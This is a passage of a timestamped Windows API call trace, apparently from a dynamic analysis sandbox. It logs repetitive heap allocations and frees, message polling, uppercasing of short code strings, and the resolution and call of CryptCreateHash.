[0187.740] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2d28 [0187.740] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0187.740] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c68 | out: hHeap=0x25c0000) returned 1 [0187.740] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0187.740] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa748 [0187.740] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0187.740] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0187.740] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0187.740] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2412248 [0187.740] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0187.740] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0187.740] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0187.740] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa760 [0187.740] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0060 | out: hHeap=0x25c0000) returned 1 [0187.741] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0060 [0187.741] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c68 [0187.741] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0187.741] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c68 | out: hHeap=0x25c0000) returned 1 [0187.741] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0060 | out: hHeap=0x25c0000) returned 1 [0187.741] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0187.741] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0187.741] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0187.741] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2412248 | out: hHeap=0x25c0000) returned 1 [0187.741] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0187.741] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0187.741] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0187.741] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0187.741] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0187.741] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0187.742] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0187.742] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0187.742] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2412248 [0187.742] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa760 [0187.742] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2412248 | out: hHeap=0x25c0000) returned 1 [0187.742] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0187.742] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0187.742] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0187.742] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0187.742] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0187.742] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0187.742] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0187.742] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2412248 [0187.742] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa760 [0187.742] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2412248 | out: hHeap=0x25c0000) returned 1 [0187.743] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0187.743] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0187.743] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0187.743] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0187.743] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0187.743] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0187.743] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0187.743] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0187.743] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0187.743] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0187.743] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0187.743] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0187.743] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0187.743] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0187.743] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0187.743] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0187.744] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0187.744] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0187.744] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2412248 [0187.744] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c68 [0187.744] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0060 [0187.744] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0187.744] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c68 | out: hHeap=0x25c0000) returned 1 [0187.744] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0060 | out: hHeap=0x25c0000) returned 1 [0187.744] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa430 [0187.744] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0187.744] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0187.744] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0187.744] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0070 [0187.744] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0187.744] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa760 [0187.745] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0080 [0187.745] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa490 [0187.745] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0080 | out: hHeap=0x25c0000) returned 1 [0187.745] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0080 [0187.745] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c68 [0187.745] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0187.745] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c68 | out: hHeap=0x25c0000) returned 1 [0187.745] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0080 | out: hHeap=0x25c0000) returned 1 [0187.745] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0187.745] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0187.745] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0187.745] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0070 | out: hHeap=0x25c0000) returned 1 [0187.745] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0060 | out: hHeap=0x25c0000) returned 1 [0187.745] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0187.745] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0187.746] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0187.746] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0187.746] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0187.746] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0070 [0187.746] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0187.746] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa760 [0187.746] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0080 [0187.746] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa490 [0187.746] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0080 | out: hHeap=0x25c0000) returned 1 [0187.746] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0187.746] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0187.746] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0187.746] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0070 | out: hHeap=0x25c0000) returned 1 [0187.747] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0060 | out: hHeap=0x25c0000) returned 1 [0187.747] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0187.747] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0187.747] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2412248 | out: hHeap=0x25c0000) returned 1 [0187.747] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0187.747] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2412248 [0187.747] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0187.747] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2412248 | out: hHeap=0x25c0000) returned 1 [0187.747] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa760 [0187.747] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2412248 [0187.747] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa490 [0187.747] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2412248 | out: hHeap=0x25c0000) returned 1 [0187.747] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0187.747] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2412248 [0187.747] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0187.748] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2412248 | out: hHeap=0x25c0000) returned 1 [0187.748] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c68 [0187.748] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0187.748] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0187.748] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2412248 [0187.748] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b70 [0187.748] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0060 [0187.748] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0187.748] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b70 | out: hHeap=0x25c0000) returned 1 [0187.748] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0060 | out: hHeap=0x25c0000) returned 1 [0187.748] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa280 [0187.748] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0187.748] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0187.748] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0187.749] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0070 [0187.749] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5e0 [0187.749] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0187.749] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0080 | out: hHeap=0x25c0000) returned 1 [0187.749] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0187.749] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b70 | out: hHeap=0x25c0000) returned 1 [0187.749] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0080 | out: hHeap=0x25c0000) returned 1 [0187.749] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0187.749] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0187.749] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0187.749] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0070 | out: hHeap=0x25c0000) returned 1 [0187.749] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0060 | out: hHeap=0x25c0000) returned 1 [0187.749] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0187.750] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0187.750] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0187.750] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0080 | out: hHeap=0x25c0000) returned 1 [0187.750] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0187.750] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0187.750] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0187.750] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0070 | out: hHeap=0x25c0000) returned 1 [0187.750] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0060 | out: hHeap=0x25c0000) returned 1 [0187.750] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0187.750] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0187.750] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2412248 | out: hHeap=0x25c0000) returned 1 [0187.750] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2412248 | out: hHeap=0x25c0000) returned 1 [0187.750] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2412248 | out: hHeap=0x25c0000) returned 1 [0187.750] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2412248 | out: hHeap=0x25c0000) returned 1 [0187.750] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c68 | out: hHeap=0x25c0000) returned 1 [0187.750] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0060 | out: hHeap=0x25c0000) returned 1 [0187.751] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0187.751] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0187.751] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0187.751] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2412248 | out: hHeap=0x25c0000) returned 1 [0187.751] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2412248 | out: hHeap=0x25c0000) returned 1 [0187.751] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0060 | out: hHeap=0x25c0000) returned 1 [0187.751] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0187.751] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0187.751] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0187.751] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2412248 | out: hHeap=0x25c0000) returned 1 [0187.751] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2412248 | out: hHeap=0x25c0000) returned 1 [0187.751] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0060 | out: hHeap=0x25c0000) returned 1 [0187.751] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0187.751] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0187.751] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0187.751] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2412248 | out: hHeap=0x25c0000) returned 1 [0187.751] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0187.752] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0187.752] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0060 | out: hHeap=0x25c0000) returned 1 [0187.752] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0187.752] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0070 | out: hHeap=0x25c0000) returned 1 [0187.752] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0187.752] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0070 | out: hHeap=0x25c0000) returned 1 [0187.752] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0187.752] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0080 | out: hHeap=0x25c0000) returned 1 [0187.752] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0187.752] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0070 | out: hHeap=0x25c0000) returned 1 [0187.752] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0187.752] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0090 | out: hHeap=0x25c0000) returned 1 [0187.752] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0187.752] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0070 | out: hHeap=0x25c0000) returned 1 [0187.753] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0187.753] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0187.753] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0187.753] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0070 | out: hHeap=0x25c0000) returned 1 [0187.753] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0187.753] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0187.753] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0187.753] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0187.753] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0070 | out: hHeap=0x25c0000) returned 1 [0187.753] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0187.753] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0187.753] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0187.753] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x34aa340, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0187.753] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0187.754] GetProcAddress (hModule=0x74d40000, lpProcName="CryptCreateHash") returned 0x74d4df4e [0187.754] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0187.754] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0187.754] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0187.754] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0070 | out: hHeap=0x25c0000) returned 1 [0187.754] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00d0 | out: hHeap=0x25c0000) returned 1 [0187.754] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00e0 | out: hHeap=0x25c0000) returned 1 [0187.754] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0187.754] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0187.754] CryptCreateHash (in: hProv=0xab26f0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8bef50 | out: phHash=0x8bef50) returned 1 [0187.755] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0187.755] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0187.755] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00f0 [0187.755] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0187.755] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0187.755] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0187.755] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00e0 [0187.755] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0187.755] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, 